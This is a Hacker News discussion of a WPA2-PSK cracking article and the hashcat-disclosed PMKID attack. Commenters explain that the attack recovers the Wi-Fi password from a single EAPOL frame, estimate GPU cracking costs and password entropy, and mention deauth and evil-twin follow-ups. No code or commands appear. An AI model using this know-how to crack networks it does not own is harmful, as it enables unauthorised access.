
Cracking WPA-2 Just Got a Whole Lot Easier - iou
https://medium.com/@billbuchanan_27654/the-beginning-of-the-end-of-wpa-2-cracking-wpa-2-just-got-a-whole-lot-easier-55d7775a7a5a
======
dsp1234
Note that the beginning of the article quickly mentions the new attack that
doesn't require the 4-way handshake. Then the rest of the article describes
the 4-way handshake attack.

Here is the source for information on the attack that only requires a single
EAPOL frame[0].

 _" This attack was discovered accidentally while looking for new ways to
attack the new WPA3 security standard. WPA3 will be much harder to attack
because of its modern key establishment protocol called "Simultaneous
Authentication of Equals" (SAE).

The main difference from existing attacks is that in this attack, capture of a
full EAPOL 4-way handshake is not required. The new attack is performed on the
RSN IE (Robust Security Network Information Element) of a single EAPOL frame.

At this time, we do not know for which vendors or for how many routers this
technique will work, but we think it will work against all 802.11i/p/q/r
networks with roaming functions enabled (most modern routers).

The main advantages of this attack are as follow: No more regular users
required - because the attacker directly communicates with the AP (aka
"client-less" attack) No more waiting for a complete 4-way handshake between
the regular user and the AP No more eventual retransmissions of EAPOL frames
(which can lead to uncrackable results) No more eventual invalid passwords
sent by the regular user No more lost EAPOL frames when the regular user or
the AP is too far away from the attacker No more fixing of nonce and
replaycounter values required (resulting in slightly higher speeds)"_ [0]

[0] -
[https://hashcat.net/forum/thread-7717.html](https://hashcat.net/forum/thread-7717.html)

~~~
sctb
And discussed here:
[https://news.ycombinator.com/item?id=17687700](https://news.ycombinator.com/item?id=17687700).

------
alanfranzoni
I'm not totally sure of what "cracking" means in this context. Without the
4-way handshake, what does "cracking" mean? Am I discovering the wifi network
password, or am I able to decrypt a client's WPA2-protected connection? That's
very different!

In WPA, in contrast with WEP, knowing a network's password does not
automatically let you sniff another client's traffic. So, the distinction is
quite interesting.

~~~
sp332
Thanks, that was something the article should have more more clear. The attack
gets you the wifi password but you still can't eavesdrop on other users.

------
chaosite
This seems to be the attack mentioned in the blog:
[https://hashcat.net/forum/thread-7717.html](https://hashcat.net/forum/thread-7717.html)

Basically it seems like there's a thing called PMKID, which is a HMAC-SHA1 of
the PMK and things we know, which you can get just by asking for it.

------
cmurf
Is there a new hardware dependency for supporting WPA3? Or could most existing
802.11ac era APs be firmware flashed to support WPA3? (Setting aside the
business case where there's probably insufficient economies of scale for paid
software upgrades for existing hardware that would enable WPA3, rather than
just selling a new product.)

~~~
semi-extrinsic
From browsing the DD-WRT forums it seems very likely that new hardware
(802.11ax support specifically) will be required. If not in theory, at least
in practice.

------
criddell
Near the end of the video didn't he supply the password (Ankle123)? If so,
what was actually cracked?

I have a reasonably strong password on my wifi (it looks something like
"OwEs3PMY7yk6qwR4ic"). Is this crackable with this guy's setup in a couple of
days?

~~~
semi-extrinsic
No. They use Hashcat to generate a large table of keys based on a dictionary +
permutations. So "L4vend3rB1ue" is likely crackable in few days, whereas
"kGsunI68$@4g" is not.

Also, they say "with a reasonably priced GPU cracking infrastructure, many
systems can be cracked within a few days."

I take this to mean they're using something of the order of magnitude of a
couple K80 instances on Google Cloud, which will cost $25 per day. By no means
prohibitive if you want to try and crack one specific WiFi, but too expensive
for wardriving etc.

~~~
tzs
This reminds me of something I've wondered about with brute force cracking.

Suppose Alice uses a 14 character password, each character chosen at random
from the range [U+0021, U+007E] (e.g., the 94 printable ASCII characters above
space). There are 4.21x10^27 or 2^91.8 possible passwords for Alice.

Bob, on the other hand, uses a 20 character password, also chosen at random,
but Bob used a much smaller character set. He just used the 10 ASCII digits.
There are 1x10^20 or 2^66.4 possible passwords for Bob. (Bob would need 28
digits for his password space to be as large as Alice's).

Bob's passwords come from a much smaller set, and so could be brute forced
much faster--if the attacker knew that they only had to search that much
smaller set. In most cases, though, the attacker will not know that.

But, a lot of people do use reduced character sets, so I'd expect brute force
attackers to give some preference for searching those first--but how much?
Would they be likely to find Bob's 20 character all numeric password ahead of
Alice's 14 character all-94 password?

~~~
Dylan16807
> But, a lot of people do use reduced character sets, so I'd expect brute
> force attackers to give some preference for searching those first--but how
> much?

The correct answer is that it barely matters.

So an Alice password is worth 27.6 digits and if you went in order of entropy
you'd try them after you try 27 digit passwords.

Let's say you think it's overwhelmingly likely that a password is Alice-style,
maybe 99% likely. This suggests that you devote 1% of your processing power to
Bob style. Instead of trying Alice-style passwords after you try 27 digit
passwords, you will try them after... 25 digit passwords

Because the difficulty increases exponentially, devoting just a smidge of
processing power to each different kind means that your progress goes roughly
in order of increasing entropy.

And Bob's password will be cracked first, since "digits" is a very reasonable
category to devote some computation to.

------
discreditable
WPA2's day is past imho. It's a shame that WPA3 looks like it might have its
own problems thanks to closet development.

------
fixermark
This story might want a caveat: "If the password doesn't change frequently."

I think most people still don't think of "Key can be brute-forced in a few
days of offline processing" as "owned," necessarily.

~~~
close04
"Several days" is orders of magnitude less than the interval between most
password changes. The vast majority of users _never_ change their WiFi
password unless they get a new router.

------
danmg
This isn't new. mode 2501 cracking in hashcat has been there for over a year.

------
voxadam
It seems like it might be time to configure my mobile devices (e.g. phones and
laptops) to use my newly configured Wireguard VPN even when using my own
WPA2-PSK (AES) wifi at home.

~~~
sp332
You can't eavesdrop on other wifi users with this attack. This just gets you
the wifi password.

Edit: There is another kind of attack that could extend this though. An
attacker sets up an AP with the same SSID, and the same password (using the
new attack). Then they kick you off the real network with a deauth attack and
hope your device reconnects to theirs.

~~~
Fnoord
WPA2 doesn't have forward secrecy [1]

[1] [https://en.wikipedia.org/wiki/Wi-
Fi_Protected_Access#Lack_of...](https://en.wikipedia.org/wiki/Wi-
Fi_Protected_Access#Lack_of_forward_secrecy)

~~~
sp332
I'm not an expert, but wouldn't they have to sniff the four-way handshake for
that to work? This new attack specifically doesn't do that.

------
Qub3d
Is it bad that I want to go make a wardriving setup again?

------
Fnoord
This is about WPA2-PSK (aka WPA2-Personal), not WPA2 (aka WPA2-Enterprise).
PSK was already vulnerable to brute force attacks. It always is.

------
tunesmith
Any recommendations on what an Airport Extreme user should move on to if
they're looking for something similarly easy to set up?

~~~
givinguflac
I’ve yet to find a router that is as easy to set up and works as well. Asus
routers are decent if you spend the time to configure, but there are tons of
options. I use Asus with the Merlin open firmware and it’s great. I’m not
aware of any router that supports wpa3 yet.

Edit: FWIW, mesh is the new hype, but it still can’t beat wired access points.

------
nexact
Not every vendor is including RSN data. "A whole lot easier " is an
overstatement imo.

------
grendelt
> sparenly

?!

------
ozfive
Hahaha keep trying. I'm close to a solution to this wifi cracking problem!
Taking days or even hours won't be able to touch what I have...

~~~
yjftsjthsd-h
Would you care to share your approach?

~~~
jacoblambda
flip the router over and write down the password?

~~~
Joyfield
Write? What kind of savage are you? Take a picture of it.

~~~
ozfive
Good one!

